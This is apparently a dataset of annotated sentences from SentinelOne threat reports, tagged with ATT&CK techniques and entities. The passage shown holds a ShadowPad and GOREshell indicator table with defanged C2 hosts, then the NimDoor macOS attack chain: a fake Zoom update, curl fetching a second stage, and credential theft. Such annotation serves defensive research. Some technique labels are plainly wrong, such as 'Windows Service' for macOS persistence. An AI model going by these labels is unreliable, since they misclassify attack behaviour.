"60_SentinelOne_report", "page_number": 1, "sentence_id": 152, "context_before": "Prev\nFreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network", "sentence_text": "Next macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware Related Posts Ghost in the Zip | New PXA Stealer and Its Telegram-Powered Ecosystem August 04 2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware July 02 2025 [FILTERED_TABLES_START]\n106248206f1c995a76058999ccd6a6d0f420461e | Webshell 411180c89953ab5e0c59bd4b835eef740b550823 | GOREshell (snapd)\n4896cfff334f846079174d3ea2d541eec72690a0 | Nimbo-C2 agent (PfSvc.exe)\n5ee4be6f82a16ebb1cf8f35481c88c2559e5e41a | ShadowPad 7dabf87617d646a9ec3e135b5f0e5edae50cd3b9 | GOREshell (update-notifier)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s153-e86be8", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 153, "context_before": "Next macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware Related Posts Ghost in the Zip | New PXA Stealer and Its Telegram-Powered Ecosystem August 04 2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware July 02 2025 [FILTERED_TABLES_START]\n106248206f1c995a76058999ccd6a6d0f420461e | Webshell 411180c89953ab5e0c59bd4b835eef740b550823 | GOREshell (snapd)\n4896cfff334f846079174d3ea2d541eec72690a0 | Nimbo-C2 agent (PfSvc.exe)\n5ee4be6f82a16ebb1cf8f35481c88c2559e5e41a | ShadowPad 7dabf87617d646a9ec3e135b5f0e5edae50cd3b9 | GOREshell (update-notifier)", "sentence_text": "a31642046471ec138bb66271e365a01569ff8d7f | GOREshell a88f34c0b3a6df683bb89058f8e7a7d534698069", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s154-1dee4a", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 154, "context_before": "a31642046471ec138bb66271e365a01569ff8d7f | GOREshell a88f34c0b3a6df683bb89058f8e7a7d534698069", "sentence_text": "| ShadowPad aa6a9c25aff0e773d4189480171afcf7d0f69ad9 | ShadowPad c43b0006b3f7cd88d31aded8579830168a44ba79 | ShadowPad cb2d18fb91f0cd88e82cb36b614cfedf3e4ae49b | GOREshell (glib-2.0.dll)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s155-2050ed", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 155, "context_before": "| ShadowPad aa6a9c25aff0e773d4189480171afcf7d0f69ad9 | ShadowPad c43b0006b3f7cd88d31aded8579830168a44ba79 | ShadowPad cb2d18fb91f0cd88e82cb36b614cfedf3e4ae49b | GOREshell (glib-2.0.dll)", "sentence_text": "cbe82e23f8920512b1cf56f3b5b0bca61ec137b9 | Legitimate VMWare executable", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s156-a02f0c", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 156, "context_before": "cbe82e23f8920512b1cf56f3b5b0bca61ec137b9 | Legitimate VMWare executable", "sentence_text": "(VGAuthService.exe)\nebe6068e2161fe359a63007f9febea00399d7ef3 | GOREshell f52e18b7c8417c7573125c0047adb32d8d813529 | ShadowPad (AppSov.exe)\ncloud.trendav[.]co | Suspected PurpleHaze infrastructure downloads.trendav[.]vip", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s157-3ba477", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 157, "context_before": "(VGAuthService.exe)\nebe6068e2161fe359a63007f9febea00399d7ef3 | GOREshell f52e18b7c8417c7573125c0047adb32d8d813529 | ShadowPad (AppSov.exe)\ncloud.trendav[.]co | Suspected PurpleHaze infrastructure downloads.trendav[.]vip", "sentence_text": "| GOREshell C2 server dscriy.chtq[.]net | ShadowPad C2 server epp.navy[.]ddns[.]info | GOREshell C2 server mail.ccna[.]organiccrap[.]com | GOREshell C2 server mail.secmailbox[.]us | Suspected PurpleHaze infrastructure network.oossafe[.]com | Suspected ShadowPad C2 server news.imaginerjp[.]com | ShadowPad C2 server notes.oossafe[.]com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s158-d6a1e3", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 158, "context_before": "| GOREshell C2 server dscriy.chtq[.]net | ShadowPad C2 server epp.navy[.]ddns[.]info | GOREshell C2 server mail.ccna[.]organiccrap[.]com | GOREshell C2 server mail.secmailbox[.]us | Suspected PurpleHaze infrastructure network.oossafe[.]com | Suspected ShadowPad C2 server news.imaginerjp[.]com | ShadowPad C2 server notes.oossafe[.]com", "sentence_text": "| Suspected ShadowPad C2 server tatacom.duckdns[.]org | C2 server updata.dsqurey[.]com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s159-9f021c", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 159, "context_before": "| Suspected ShadowPad C2 server tatacom.duckdns[.]org | C2 server updata.dsqurey[.]com", "sentence_text": "| ShadowPad C2 server 107.173.111[.]26", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s160-469f44", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 160, "context_before": "| ShadowPad C2 server 107.173.111[.]26", "sentence_text": "| GOREshell C2 server 128.199.124[.]136 | C2 server 142.93.214[.]219", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s161-0e2a08", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 161, "context_before": "| GOREshell C2 server 128.199.124[.]136 | C2 server 142.93.214[.]219", "sentence_text": "| GOREshell C2 server 45.13.199[.]209 | Exfiltration IP address 65.38.120[.]110 | ShadowPad C2 server [FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s1-1f1c7b", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "A novel persistence mechanism takes advantage of SIGINT/SIGTERM signal handlers to install persistence when the malware is terminated or the system rebooted.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "\"Install persistence via SIGINT/SIGTERM signal handlers\"", "entities": [ { "text": " install persistence ", "start": 82, "end": 103, "label": "Action" }, { "text": "takes advantage of SIGINT/SIGTERM signal handlers to install persistence ", "start": 30, "end": 103, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s2-0024f7", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "A novel persistence mechanism takes advantage of SIGINT/SIGTERM signal handlers to install persistence when the malware is terminated or the system rebooted.", "sentence_text": "The threat actors deploy AppleScripts widely, both to gain initial access and also later in the attack chain to function as lightweight beacons and backdoors.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.002", "name": "Command and Scripting Interpreter: AppleScript" } ], "procedure": "\"Deploy AppleScripts for initial access and as lightweight beacons/backdoors\"", "entities": [ { "text": " threat actors", "start": 3, "end": 17, "label": "ThreatActor" }, { "text": "AppleScripts", "start": 25, "end": 37, "label": "MalwareTool" }, { "text": "deploy", "start": 18, "end": 24, "label": "Action" }, { "text": "gain initial access", "start": 54, "end": 73, "label": "Action" }, { "text": "function as lightweight beacons and backdoors.", "start": 112, "end": 158, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s3-e56caa", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "The threat actors deploy AppleScripts widely, both to gain initial access and also later in the attack chain to function as lightweight beacons and backdoors.", "sentence_text": "Bash scripts are used to exfiltrate Keychain credentials, browser data and Telegram user data.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "\"Exfiltrate Keychain credentials, browser data, and Telegram user data using Bash scripts\"", "entities": [ { "text": "Bash scripts", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "exfiltrate Keychain credentials", "start": 25, "end": 56, "label": "Action" }, { "text": "browser data and Telegram user data", "start": 58, "end": 93, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s4-d5866b", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Bash scripts are used to exfiltrate Keychain credentials, browser data and Telegram user data.", "sentence_text": "SentinelLABS’ analysis highlights novel TTPs and malware artifacts that tie together previously reported components, extending our understanding of the threat actors’ evolving playbook.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s6-34ec13", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "In April 2025, Huntabil.", "sentence_text": "IT observed a targeted attack on a Web3 startup, attributing the incident to a DPRK threat actor group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s7-25f469", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "IT observed a targeted attack on a Web3 startup, attributing the incident to a DPRK threat actor group.", "sentence_text": "Several reports on social media at the time described similar incidents at other Web3 and Crypto organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s8-95a289", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "Several reports on social media at the time described similar incidents at other Web3 and Crypto organizations.", "sentence_text": "Analysis revealed an attack chain consisting of an eclectic mix of scripts and binaries written in AppleScript, C++ and Nim.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s9-9ef007", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "Analysis revealed an attack chain consisting of an eclectic mix of scripts and binaries written in AppleScript, C++ and Nim.", "sentence_text": "A report by Huntress in mid-June described a similar initial attack chain as observed by Huntabil.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s10-a7b5f9", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "A report by Huntress in mid-June described a similar initial attack chain as observed by Huntabil.", "sentence_text": "IT, albeit using different later stage payloads.\nSentinelLABS’ analysis of the payloads used in the April incidents shows the Nim stages contain some unique features including encrypted configuration handling, asynchronous execution built around Nim’s native runtime, and a signal-based persistence mechanism previously unseen in macOS malware.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "\"signal-based persistence mechanism\"", "entities": [ { "text": "Nim stages", "start": 126, "end": 136, "label": "MalwareTool" }, { "text": "signal-based persistence mechanism", "start": 274, "end": 308, "label": "Action" }, { "text": "asynchronous execution", "start": 210, "end": 232, "label": "Action" }, { "text": "encrypted configuration handling", "start": 176, "end": 208, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s11-ea5761", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "IT, albeit using different later stage payloads.\nSentinelLABS’ analysis of the payloads used in the April incidents shows the Nim stages contain some unique features including encrypted configuration handling, asynchronous execution built around Nim’s native runtime, and a signal-based persistence mechanism previously unseen in macOS malware.", "sentence_text": "In this post, we provide an overview of the attack chain and a technical analysis of the C++ and Nim-based components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s12-623cf4", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "In this post, we provide an overview of the attack chain and a technical analysis of the C++ and Nim-based components.", "sentence_text": "We refer to this family of malware collectively as NimDoor, based on its functionality and development traits.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s13-18d46c", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "We refer to this family of malware collectively as NimDoor, based on its functionality and development traits.", "sentence_text": "Indicators of compromise and insights into the malware’s architecture are provided to aid defenders and threat hunters in identifying related activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s14-acf160", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Indicators of compromise and insights into the malware’s architecture are provided to aid defenders and threat hunters in identifying related activity.", "sentence_text": "Initial Access and Payload Delivery", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s15-10acd0", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "Initial Access and Payload Delivery", "sentence_text": "The attack chain begins with a now-familiar social engineering vector: impersonation of a trusted contact over Telegram and inviting the target to schedule a meeting via Calendly.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Impersonation of trusted contact over Telegram; luring via Calendly", "entities": [ { "text": " Telegram", "start": 110, "end": 119, "label": "Action" }, { "text": "Calendly", "start": 170, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "impersonation", "start": 71, "end": 84, "label": "Action" }, { "text": "inviting the target to schedule a meeting", "start": 124, "end": 165, "label": "Action" }, { "text": " Telegram", "start": 110, "end": 119, "label": "Infrastructure_Indicator" }, { "text": " impersonation of a trusted contact ", "start": 70, "end": 106, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s16-4c1b6b", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "The attack chain begins with a now-familiar social engineering vector: impersonation of a trusted contact over Telegram and inviting the target to schedule a meeting via Calendly.", "sentence_text": "The target is subsequently sent an email containing a Zoom meeting link and instructions to run a so-called “Zoom SDK update script”.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Send phishing email with malicious “Zoom SDK update script” link", "entities": [ { "text": "Zoom SDK update script", "start": 109, "end": 131, "label": "MalwareTool" }, { "text": "sent an email", "start": 27, "end": 40, "label": "Action" }, { "text": "Zoom meeting link", "start": 54, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "email", "start": 35, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "instructions to run a so-called “Zoom SDK update script", "start": 76, "end": 131, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s17-1709d8", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "The target is subsequently sent an email containing a Zoom meeting link and instructions to run a so-called “Zoom SDK update script”.", "sentence_text": "An attacker-controlled domain hosts an AppleScript file named zoom_sdk_support.scpt .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Host AppleScript malware on attacker-controlled domain", "entities": [ { "text": "attacker-controlled domain", "start": 3, "end": 29, "label": "ThreatActor" }, { "text": "AppleScript file named zoom_sdk_support.scpt", "start": 39, "end": 83, "label": "MalwareTool" }, { "text": "attacker-controlled domain", "start": 3, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "hosts ", "start": 30, "end": 36, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s18-2443f0", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "An attacker-controlled domain hosts an AppleScript file named zoom_sdk_support.scpt .", "sentence_text": "Variants of this script can be found in public malware repositories through the seemingly unintentional typo in a code comment:\n- - Zook SDK Update instead of - - Zoom SDK Update .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Malware variants are publicly available in repositories", "entities": [ { "text": "Variants of this script", "start": 0, "end": 23, "label": "MalwareTool" }, { "text": "public malware repositories ", "start": 40, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "Zook SDK Update", "start": 132, "end": 147, "label": "MalwareTool" }, { "text": "can be found", "start": 24, "end": 36, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s19-e80eb6", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Variants of this script can be found in public malware repositories through the seemingly unintentional typo in a code comment:\n- - Zook SDK Update instead of - - Zoom SDK Update .", "sentence_text": "The script ends with three lines of malicious code that retrieve and execute a second-stage script from a command-and-control server hosted at support.us05web-zoom[.]forum .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "retrieve and execute a second-stage script from a command-and-control server", "entities": [ { "text": "malicious code", "start": 36, "end": 50, "label": "MalwareTool" }, { "text": "script", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": "support.us05web-zoom[.]forum ", "start": 143, "end": 172, "label": "Infrastructure_Indicator" }, { "text": "retrieve and execute a second-stage script", "start": 56, "end": 98, "label": "Action" }, { "text": "command-and-control server", "start": 106, "end": 132, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s20-95fc72", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "The script ends with three lines of malicious code that retrieve and execute a second-stage script from a command-and-control server hosted at support.us05web-zoom[.]forum .", "sentence_text": "This domain name format has been chosen for similarity to the legitimate Zoom meeting domain us05web.zoom[.]us Our analysis found a number of parallel domains in use by the same actor.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "register deceptive domains similar to legitimate Zoom domain", "entities": [ { "text": "us05web.zoom[.]us", "start": 93, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "number of parallel domains", "start": 132, "end": 158, "label": "Infrastructure_Indicator" }, { "text": "chosen for similarity", "start": 33, "end": 54, "label": "Action" }, { "text": "found a number of parallel domains in use", "start": 124, "end": 165, "label": "Action" }, { "text": "same actor", "start": 173, "end": 183, "label": "ThreatActor" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s21-aa981f", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "This domain name format has been chosen for similarity to the legitimate Zoom meeting domain us05web.zoom[.]us Our analysis found a number of parallel domains in use by the same actor.", "sentence_text": "support.us05web-zoom[.]pro\nsupport.us05web-zoom[.]forum\nsupport.us05web-zoom[.]cloud\nsupport.us06web-zoom[.]online\nThe follow-on script downloads an HTML file named check , which includes a legitimate Zoom redirect link.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download HTML file from remote server via follow-on script.", "entities": [ { "text": "support.us05web-zoom[.]pro\nsupport.us05web-zoom[.]forum\nsupport.us05web-zoom[.]cloud\nsupport.us06web-zoom[.]online", "start": 0, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "follow-on script", "start": 119, "end": 135, "label": "MalwareTool" }, { "text": "downloads an HTML file named check , which includes a legitimate Zoom redirect link", "start": 136, "end": 219, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s22-75e182", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "support.us05web-zoom[.]pro\nsupport.us05web-zoom[.]forum\nsupport.us05web-zoom[.]cloud\nsupport.us06web-zoom[.]online\nThe follow-on script downloads an HTML file named check , which includes a legitimate Zoom redirect link.", "sentence_text": "Temporary Redirect This HTML file is passed to curl and executed via run script , ultimately launching the attack’s core logic.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Execute HTML via curl/run script to launch core malware logic", "entities": [ { "text": "This HTML file", "start": 108, "end": 122, "label": "MalwareTool" }, { "text": "curl", "start": 136, "end": 140, "label": "MalwareTool" }, { "text": "run script", "start": 158, "end": 168, "label": "MalwareTool" }, { "text": "passed to curl", "start": 126, "end": 140, "label": "Action" }, { "text": "executed via run script", "start": 145, "end": 168, "label": "Action" }, { "text": "launching the attack’s core logic.", "start": 182, "end": 216, "label": "Action" }, { "text": "\"https://us05web.zoom[.]us/j/4724012536?pwd=ADlAXdxkUclRhvYoJbpKQmizkQ1RV4.1\"", "start": 7, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s23-6c5639", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Temporary Redirect This HTML file is passed to curl and executed via run script , ultimately launching the attack’s core logic.", "sentence_text": "Researchers at\nValidin\nhave also recently published extended indicators around this and associated infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s24-d2465c", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "Researchers at\nValidin\nhave also recently published extended indicators around this and associated infrastructure.", "sentence_text": "The posts by Huntabil.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s25-96111e", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "The posts by Huntabil.", "sentence_text": "IT and Huntress mentioned earlier describe much the same initial attack chain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s26-241bcb", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "IT and Huntress mentioned earlier describe much the same initial attack chain.", "sentence_text": "However, the second part of the attack chain is where things begin to get both different and increasingly complex.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s27-122210", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "However, the second part of the attack chain is where things begin to get both different and increasingly complex.", "sentence_text": "Execution Chain and File Deployment", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s28-dae37a", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "Execution Chain and File Deployment", "sentence_text": "The multi-staged infection process Huntabil.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s29-0a58a3", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "The multi-staged infection process Huntabil.", "sentence_text": "IT observed resulted in the download of two Mach-O binaries— and installer —into /private/var/tmp .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "download of two Mach-O binaries— and installer —into /private/var/tmp", "entities": [ { "text": "/private/var/tmp .", "start": 81, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "two Mach-O binaries", "start": 40, "end": 59, "label": "MalwareTool" }, { "text": "download of two Mach-O binaries", "start": 28, "end": 59, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s30-ba9206", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "IT observed resulted in the download of two Mach-O binaries— and installer —into /private/var/tmp .", "sentence_text": "These two binaries set off two independent execution chains.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "binaries set off two independent execution chains", "entities": [ { "text": "These two binaries", "start": 0, "end": 18, "label": "MalwareTool" }, { "text": "set off two independent execution chains.", "start": 19, "end": 60, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s31-518ba5", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "These two binaries set off two independent execution chains.", "sentence_text": "In the first, the binary is a C++-compiled universal architecture Mach-O executable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s32-ce5807", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "In the first, the binary is a C++-compiled universal architecture Mach-O executable.", "sentence_text": "It writes an encrypted embedded payload called netchk to disk.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Writes encrypted embedded payload ‘netchk’ to disk", "entities": [ { "text": " netchk", "start": 46, "end": 53, "label": "MalwareTool" }, { "text": "disk", "start": 57, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "writes an encrypted embedded payload", "start": 3, "end": 39, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s33-0b0cb3", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "It writes an encrypted embedded payload called netchk to disk.", "sentence_text": "The execution from here involves a complex chain of obfuscation and distraction which we describe in the following section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-61_SentinelOne_report-p1-s34-2db562", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The execution from here involves a complex chain of obfuscation and distraction which we describe in the following section.", "sentence_text": "Ultimately, the aim is to fetch two Bash scripts used for data exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1052", "name": "Exfiltration Over Physical Medium" } ], "procedure": "fetch two Bash scripts used for data exfiltration", "entities": [ { "text": "fetch ", "start": 26, "end": 32, "label": "Action" }, { "text": "data exfiltration.", "start": 58, "end": 76, "label": "Action" }, { "text": "two Bash scripts ", "start": 32, "end": 49, "label": "MalwareTool" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s35-286ea5", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "Ultimately, the aim is to fetch two Bash scripts used for data exfiltration.", "sentence_text": "These include mechanisms for scraping general system data as well as application-specific data like browser data and Telegram chat histories.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Scrape general system data and application-specific data (browser data, Telegram chat histories)", "entities": [ { "text": "mechanisms", "start": 14, "end": 24, "label": "MalwareTool" }, { "text": "scraping general system data as well as application-specific data", "start": 29, "end": 94, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s36-473039", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "These include mechanisms for scraping general system data as well as application-specific data like browser data and Telegram chat histories.", "sentence_text": "All operations are staged from a folder created at ~/Library/DnsService", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1074", "name": "Data Staged" }, { "id": "T1036", "name": "Masquerading" }, { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "staged from a folder created at ~/Library/DnsService", "entities": [ { "text": "~/Library/DnsService", "start": 51, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "taged from a folder", "start": 20, "end": 39, "label": "Action" } ] }, { "uid": "sentinel-61_SentinelOne_report-p1-s37-17219d", "source": "sentinel", "doc_id": "61_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "All operations are staged from a folder created at ~/Library/DnsService", "sentence_text": "The second execution chain starts with the installer binary, which is also a universal Mach-O executable compiled from Nim source code, and is responsible for persistence setup.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": 